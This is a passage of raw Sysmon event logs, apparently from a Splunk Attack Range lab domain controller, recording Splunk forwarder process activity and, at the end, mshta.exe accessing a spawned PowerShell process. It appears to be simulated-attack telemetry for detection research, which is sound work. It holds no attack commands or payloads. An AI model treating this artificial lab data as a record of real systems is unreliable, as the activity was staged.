Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029951Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.984{7901BC46-547A-6008-C806-00000000A301}6904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029950Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.342{7901BC46-547A-6008-C706-00000000A301}62886584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029949Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.201{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-547A-6008-C706-00000000A301}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029948Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.201{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029947Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.201{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029946Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.201{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029945Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.201{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029944Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.201{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-547A-6008-C706-00000000A301}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029943Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.201{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-547A-6008-C706-00000000A301}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029942Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:10.202{7901BC46-547A-6008-C706-00000000A301}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029967Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:11.654{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-547B-6008-C906-00000000A301}1544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029966Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:11.654{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029965Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:11.654{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029964Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:11.654{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029963Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:11.654{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029962Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:11.654{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-547B-6008-C906-00000000A301}1544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029961Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:11.654{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-547B-6008-C906-00000000A301}1544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029960Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:11.655{7901BC46-547B-6008-C906-00000000A301}1544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029959Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:11.139{7901BC46-547A-6008-C806-00000000A301}69045508C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030049Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.981{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-54A4-6008-CB06-00000000A301}1100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030048Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.934{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-54A4-6008-CC06-00000000A301}1524C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030047Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.934{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-54A4-6008-CC06-00000000A301}1524C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030046Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.934{7901BC46-54A4-6008-CC06-00000000A301}15246848C:\Windows\system32\conhost.exe{7901BC46-54A4-6008-CB06-00000000A301}1100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030045Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.934{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-54A4-6008-CC06-00000000A301}1524C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030044Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.919{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030043Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.919{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030042Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.919{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030041Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.919{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-54A4-6008-CB06-00000000A301}1100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030040Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.919{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030039Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.919{7901BC46-54A4-6008-CA06-00000000A301}44726672C:\Windows\System32\mshta.exe{7901BC46-54A4-6008-CB06-00000000A301}1100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.d